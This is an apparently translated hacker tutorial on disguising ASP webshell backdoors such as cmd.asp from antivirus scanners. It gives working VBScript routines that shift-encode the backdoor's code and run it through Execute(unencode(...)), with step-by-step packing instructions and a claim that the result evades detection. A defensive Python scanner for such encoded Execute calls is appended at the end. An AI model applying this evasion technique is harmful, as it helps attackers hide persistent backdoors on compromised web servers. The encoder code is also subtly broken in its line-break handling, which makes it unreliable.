Ultimate disguise of ASP Backdoors


I remember that when ASP Trojans first came out, they were called "never-killed Trojans". Haha, today any anti-virus software can kill them without any trouble. Borrowing the idea of changing a Trojan's shell to get past anti-virus software, we can also "shell" (pack) ASP Trojans (oh, of course, not with UPX). What are you waiting for? Read on.

In fact, the idea is very simple: encode the ASP code and decode it at execution time. There are two methods: one is to use Microsoft's Script Encoder tool; the other is to use ASP's Execute function.

Let's talk about Script Encoder first. It is available free of charge from the official Microsoft website, together with detailed usage instructions, so I will not go over it here. However, after a file is encrypted it carries the marker <%@ LANGUAGE = VBScript.Encode %>. How can it be decrypted? Decryption software for it exists. So now you know: Microsoft's Script Encoder is not safe, and we have to write our own program to do the "shelling".

ASP's Execute function executes strings; that is, you can write ASP statements as a string and run them with Execute. For example, the line Execute("response.write(""hackerxfiles"")") has the same effect as executing response.write("hackerxfiles"). Because the argument to Execute is a string, the quotation marks inside it have to be doubled. Haha, and since what Execute takes is a string, we can encrypt what is inside it.

How to encrypt it? Well, use the simplest shift method. See the Code:

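but = 1   ' shift amount; can be changed
' nr holds the ASP source text to be encoded
cc = Replace(nr, vbCrLf, "Hu")   ' "Hu" marks a line break; the Mid(..., 1) test below only matches a one-character marker
For i = 1 To Len(cc)
    If Mid(cc, i, 1) <> "Hu" Then
        pk = Asc(Mid(cc, i, 1)) + but
        If pk > 126 Then
            pk = pk - 95
        ElseIf pk < 32 Then
            pk = pk + 95
        End If
        temp = temp & Chr(pk)
    Else
        temp = temp & "Hu"
    End If
Next
temp = Replace(temp, """", """""")   ' double the quotes so the result can sit inside a string literal
Response.Write(temp)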

This code is the cyclic shift method in ASP. The variable but is the shift amount and can be changed. Why cyclic? Because the program checks each character's ASCII code and wraps it around when it goes above 126 or below 32, so the result always stays in the range 32 to 126. This prevents characters that cannot be displayed in Windows. It is also the reason why the carriage return/line feed is replaced at the beginning. I wrote a shift-encryption ASP program, XOR.asp, and attached it; I hope it helps you.

Let's see what the code above turns response.write("hackerxfiles") into: "sftqpotf/xsjuf)#ibdlfsygjmft#*". Hey, this time even the gods cannot understand it. ^_^

Since it has been encrypted, it has to be decrypted. Here is the decryption code:

Function unencode(temp)
    but = 1   ' shift amount; must be the same value that was used for encryption
    For i = 1 To Len(temp)
        If Mid(temp, i, 1) <> "Hu" Then   ' "Hu" is the line-break marker written by the encoder
            pk = Asc(Mid(temp, i, 1)) - but
            If pk > 126 Then
                pk = pk - 95
            ElseIf pk < 32 Then
                pk = pk + 95
            End If
            a = a & Chr(pk)
        Else
            a = a & vbCrLf
        End If
    Next
    unencode = a   ' return the decoded text
End Function

Well, now you know how to execute it. Just call the decryption function: Execute(unencode("sftqpotf/xsjuf)#ibdlfsygjmft#*"))

Here is an example showing how to encrypt an ASP Trojan. The "Ocean" ASP Trojan has too much code and I am too lazy, so let's use the short and concise cmd.asp to demonstrate!

Run the XOR.asp file I wrote, open cmd.asp in Notepad, and copy its ASP code into the XOR.asp text box (see the figure). Fill in the shift parameter (I use 1 here) and click "Convert"; the result is displayed. Create a new text document, copy in the content of cmd.asp, and add the unencode function shown earlier (note that the value of the variable but in unencode must be changed to match the shift parameter chosen during encryption). Then replace the ASP part with the form Execute(unencode(hu)), where hu is assigned the encryption result obtained in the previous step. Haha, now save it as an ASP file! A few more words here: if the code is long, it can be split into several parts that are encrypted separately and then run with several Execute calls. However, each part must be complete ASP code; that is, paired statements such as If and End If cannot be split across two Execute calls.

Let's take a look. It still runs!

There is an ASP Trojan tracker on the issue 8 CD. Haha, we can use it to check today's results. Hey, look at the results: the original cmd.asp and the Script Encoder-encrypted 2005 version of the top Ocean Network Trojan are both detected, but the xcmd.asp we just crafted is not detected at all! Haha
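The wrapper described above still leaves two things a scanner can key on: an Execute call fed by a function result, and a string literal that turns back into ASP code under one of the 94 possible shifts. The following Python check is an added example, not part of the original article; the keyword list, the regular expressions and the function names are assumptions, and the sample inputs are constructed.

```python
import re

LO, SPAN = 32, 95   # printable range 32..126 used by the article's shift routine
# Assumed keyword list: strings that suggest hidden ASP/VBScript once decoded.
KEYWORDS = ("response.write", "createobject", "wscript.shell", "request(", "execute")
STRING_LITERAL = re.compile(r'"((?:[^"\r\n]|"")*)"')
# Execute/ExecuteGlobal/Eval whose argument is a function call, e.g. Execute(unencode(...))
DYNAMIC_EXEC = re.compile(r'\b(?:executeglobal|execute|eval)\b\s*\(?\s*[a-z_]\w*\s*\(', re.I)

def unshift(text, shift):
    """Undo a cyclic shift over ASCII 32..126; other characters pass through."""
    out = []
    for ch in text:
        code = ord(ch)
        if LO <= code < LO + SPAN:
            code = (code - LO - shift) % SPAN + LO
        out.append(chr(code))
    return "".join(out)

def scan_asp(source, min_len=12):
    """Return findings as (kind, shift, keyword) tuples for one ASP source text."""
    findings = []
    if DYNAMIC_EXEC.search(source):
        findings.append(("dynamic-execute", None, None))
    for match in STRING_LITERAL.finditer(source):
        literal = match.group(1).replace('""', '"')   # undo VBScript quote doubling
        if len(literal) < min_len:
            continue
        for shift in range(1, SPAN):                  # try every non-zero shift
            plain = unshift(literal, shift).lower()
            hit = next((k for k in KEYWORDS if k in plain), None)
            if hit:
                findings.append(("shifted-code", shift, hit))
                break
    return findings

# Constructed samples: the article's shift-1 string in a wrapper, and a benign page.
WRAPPED = '<%\nExecute(unencode("sftqpotf/xsjuf)#ibdlfsygjmft#*"))\n%>'
BENIGN = '<%\nResponse.Write("Welcome back to the site")\n%>'

if __name__ == "__main__":
    for name, text in (("wrapped", WRAPPED), ("benign", BENIGN)):
        print(name, scan_asp(text))
```

A shifted-code finding is strong evidence by itself; a dynamic-execute finding alone is only a lead, since legitimate code occasionally builds statements at run time.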
 
 
